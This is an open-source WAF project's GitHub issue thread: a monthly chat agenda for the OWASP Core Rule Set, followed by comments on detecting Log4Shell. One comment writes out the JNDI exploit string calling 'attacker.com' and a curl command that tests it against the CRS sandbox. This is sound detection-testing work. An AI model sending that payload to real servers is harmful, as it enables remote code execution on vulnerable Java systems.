### ISSUE TITLE
Monthly Chat Agenda January 2022 (2022-01-03 and 2022-01-17)

### ISSUE THREAD

**Issue by dune73** [coreruleset/coreruleset#2330]
This is the Agenda for the Monthly CRS Chat.

The general chat is going to happen on https://owasp.slack.com in the channel #coreruleset on Monday, 2022-01-03, at 20:30 CET. That's the 1st Monday of the month. A separate issue chat is happening at the same location, same time on Monday, 2022-01-17. That's the 3rd Monday of the month. Please note that we have a [CRS calendar](https://calendar.google.com/calendar/u/0/embed?src=c_glsll5etlmcb3it0k433fcl5rc@group.calendar.google.com) (maintained by @fzipi).

Items on the Agenda:  (see previous meetings decisions: [here](https://github.com/coreruleset/coreruleset/issues/2291#issuecomment-987122691))

### Outside development

* [Introduction of the CRS Sandbox](https://coreruleset.org/20211209/introducing-the-crs-sandbox/)
* [Coverage of CRS Sandbox in the "Daily Swig"](https://portswigger.net/daily-swig/owasp-modsecurity-core-rule-set-sandbox-launched-to-help-security-researchers-test-new-cves)
* Blog post about script [wafparan01d3](https://github.com/alt3kx/wafparan01d3) that is an alternative to the CRS `send-payload-pls.py` script
* [CRS Log4j / Log4Shell / CVE-2021-44228 coverage](https://coreruleset.org/20211213/crs-and-log4j-log4shell-cve-2021-44228/)
* [CRS Hunt for Log4j rule bypasses](https://coreruleset.org/20211216/public-hunt-for-log4j-log4shell-evasions-waf-bypasses/)
* [Swiss Newspaper NZZ covering CRS and project co-lead Christian Folini](https://www.nzz.ch/english/why-open-source-software-programmers-work-for-free-ld.1661356) (link to English version of article)
* [Gloo by Solo is an API Gateway with CRS support](https://docs.solo.io/gloo-edge/latest/guides/security/waf/)

### PRs that have been merged since the last meeting

* #2214
* #2340
* #2338
* #2335
* #2327
* #2201
* #2325
* #2328
* #2279
* #2193
* #2324
* #2311
* #2306
* #2248

We merged 14 PRs since the last monthly project chat.

## Open PRs

* #2345
* #2343
* #2333
* #2323
* #2322
* #2299
* #2288
* #2259

 
## Open PRs marked *DRAFT* or *work in progress* or *needs action*

* #2303
* #2302
* #2301
* #2300
* #2290
* #2236
* #2222
* #2217
* #2070
* #2067
* #1993
* #1975

## Dev retreat topics
* **[Demo / Sandbox site](https://github.com/coreruleset/coreruleset/wiki/DevRetreat21DemoSite)**: @theMiddleBlue will schedule a call to talk about the setup and @lifeforms will contribute the documentation. They will let us know so that we can join in too: tentatively scheduled during meeting: Jan 19 at 17:00 (CET).
* **[Documentation](https://github.com/coreruleset/coreruleset/wiki/DevRetreat21UpdateDocumentation)**: Updates: Plugins page to go live once the final blog is published. Sampling mode blog post to be converted into a page for /docs. Docker documentation discussion/meeting to happen at some point, to discuss what we want to document and where we want it to live. -> @RedXanadu will prepare some bullet points to get people thinking about the open questions and schedule a meeting. People can sign up during our Feb chat meeting.
* **[Technical Blog Posts](https://github.com/coreruleset/coreruleset/wiki/DevRetreat21WriteTechnicalBlogPosts)**: Plugin post is almost done. @dune73 will then attack the next topic. Plus 2-3 other blog posts he has in mind.
* **[Status page](https://github.com/coreruleset/coreruleset/wiki/DevRetreat21StatusPage)**: We're really stalled due to missing responses and Felipe is apparently away. We hope we can pick this up later in January.
* **[Coraza](https://github.com/coreruleset/coreruleset/wiki/DevRetreat21CorazaIntegration)**: Coraza passes the CRS test suite 100%, Coraza 2.0 has been released.

## Other items

* Cleanup of anomaly scoring variables #2319
* Release schedule

### Status of issues covered last month

We covered 8 issues in the last meeting. This is their state:

* Issue slot 1: #2319 (probably this covers also #1896)
* Issue slot 2: #2312 - we are getting closer to release date, this should be ready to go.
* Issue slot 3: #2163
* Issue slot 4: #2230
* Issue slot 5: #2227 + #2228
* Issue slot 6: #2332
* Issue slot 7: #2331 - what to do with the log4j rule and the existing 932130?
* Issue slot 8: #2318 - volunteer to write a new sqli rule needed
* Issue slot 9: #FIXME
* Issue slot 10: #FIXME

**Stats**

* Covered in chat: 9
* Closed: 5
* Pending: 4

### This month's issues

There are FIXME open issues at the beginning of the issue chat.

We generally cover 10 issues per month in a separate issue meeting. Add them as you see fit.

* Issue slot 1: #2319
* Issue slot 2: #2332
* Issue slot 3: #2318
* Issue slot 4: #2344
* Issue slot 5: #2341 
* Issue slot 6: #2334
* Issue slot 7: #2329
* Issue slot 8: #2317
* Issue slot 9: #FIXME
* Issue slot 10: #FIXME

## How to get to our slack and join the meeting?

If you are not yet on the OWASP Slack, here is your invite: https://owasp.org/slack/invite .

Everybody is welcome to join our community chat.

**Comment by 877509395** [comment]
hi, all,


Can corerule set&nbsp; defend log4j&nbsp; ?

thanks in advance.
huiming

**Comment by dune73** [comment]
Ah, the new CVE?

What's the attack payload again?

**Comment by 877509395** [comment]
https://www.techtimes.com/articles/269208/20211210/minecraft-vulnerability-spotted-how-to-fix-log4j-bug.htm




------------------&nbsp;原始邮件&nbsp;------------------
发件人:                                                                                                                        "coreruleset/coreruleset"                                                                                    ***@***.***&gt;;
发送时间:&nbsp;2021年12月10日(星期五) 晚上6:02
***@***.***&gt;;
***@***.******@***.***&gt;;
主题:&nbsp;Re: [coreruleset/coreruleset] Monthly Chat Agenda January 2022 (2022-02-03 and 2022-01-17) (Issue #2330)





 
Ah, the new CVE?
 
What's the attack payload again?
 
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub, or unsubscribe.
Triage notifications on the go with GitHub Mobile for iOS or Android.

**Comment by 877509395** [comment]
https://www.cve.org/CVERecord?id=CVE-2021-44228




------------------&nbsp;原始邮件&nbsp;------------------
发件人:                                                                                                                        "coreruleset/coreruleset"                                                                                    ***@***.***&gt;;
发送时间:&nbsp;2021年12月10日(星期五) 晚上6:02
***@***.***&gt;;
***@***.******@***.***&gt;;
主题:&nbsp;Re: [coreruleset/coreruleset] Monthly Chat Agenda January 2022 (2022-02-03 and 2022-01-17) (Issue #2330)





 
Ah, the new CVE?
 
What's the attack payload again?
 
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub, or unsubscribe.
Triage notifications on the go with GitHub Mobile for iOS or Android.

**Comment by theMiddleBlue** [comment]
https://www.lunasec.io/docs/blog/log4j-zero-day/#exploit-steps

**Comment by dune73** [comment]
This seems to be an exploit code: `${jndi:ldap://attacker.com/a}`

CRS can detect this.

```
$ curl -H "x-format-output: txt-matched-rules" -H "x-crs-version: 3.3.2" \
--data 'foo=${jndi:ldap://attacker.com/a}' \
https://sandbox.coreruleset.org/
932130 PL1 Remote Command Execution: Unix Shell Expression Found
949110 PL1 Inbound Anomaly Score Exceeded (Total Score: 5)
```

**Comment by lifeforms** [comment]
Yep, this is more or less a coincidence though. We could add a separate Java rule that looks for `jndi:` maybe? Shall we open a new issue for this?

**Comment by dune73** [comment]
Coincidence or one more reason for our generic approach.

Are there evasion options available? Like whitespace before the colon? If yes, it's going to be trickier to avoid FPs.

Other than that I do not mind more Java injection rules. And given JNDI is such a powerful API, I'm sure this is not the last weakness to surface.

**Comment by 877509395** [comment]
For concise info you can read source code of log4j i think


------------------&nbsp;原始邮件&nbsp;------------------
发件人:                                                                                                                        "coreruleset/coreruleset"                                                                                    ***@***.***&gt;;
发送时间:&nbsp;2021年12月10日(星期五) 晚上6:32
***@***.***&gt;;
***@***.******@***.***&gt;;
主题:&nbsp;Re: [coreruleset/coreruleset] Monthly Chat Agenda January 2022 (2022-02-03 and 2022-01-17) (Issue #2330)





 
Coincidence or one more reason for our generic approach.
 
Are there evasion options available? Like whitespace before the colon? If yes, it's going to be trickier to avoid FPs.
 
Other than that I do not mind more Java injection rules. And given JNDI is such a powerful API, I'm sure this is not the last weakness to surface.
 
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub, or unsubscribe.
Triage notifications on the go with GitHub Mobile for iOS or Android.

**Comment by fzipi** [comment]
@here Can we rename this ticket to something meaningful? I don't think this is the agenda for January anymore.

**Comment by dune73** [comment]
Let's wait for the issue creation and then maybe delete this thread below the agenda.

**Comment by fionera** [comment]
Will do that :)

**Comment by franbuehler** [comment]
# Decisions

## PRs

* #2345
* #2343
* #2333
* #2323
* #2322
* #2299
* #2288
* #2259
* #2222

## Dev retreat topics

* **[Demo / Sandbox site](https://github.com/coreruleset/coreruleset/wiki/DevRetreat21DemoSite)**: We released the Sandbox and followed suit with a public contest to find bypasses for a separate CRS log4j instance with new custom rules. Positive feedback all around, but Sandbox not known enough so far. Documentation is also lacking.
* **[Documentation](https://github.com/coreruleset/coreruleset/wiki/DevRetreat21UpdateDocumentation)**: FIXME
* **[Technical Blog Posts](https://github.com/coreruleset/coreruleset/wiki/DevRetreat21WriteTechnicalBlogPosts)**: FIXME
* **[Status page](https://github.com/coreruleset/coreruleset/wiki/DevRetreat21StatusPage)**: FIXME
* **[Coraza](https://github.com/coreruleset/coreruleset/wiki/DevRetreat21CorazaIntegration)**: Coraza passes the CRS test suite 100%, Coraza 2.0 has been released.

## Other items

* Start a discussion about how the CRS should represent backslash characters in regular expressions in a portable way.
We currently use two different solutions, but we should probably be consistent and use (and document) one solution: but which solution is the clearest?
   * Some rules use: `\x5c`
   * Some rules use: `[\\\\]`
  
**We have a strong consensus now for going forward with `\x5c`**

## Issues

* Issue slot 1:
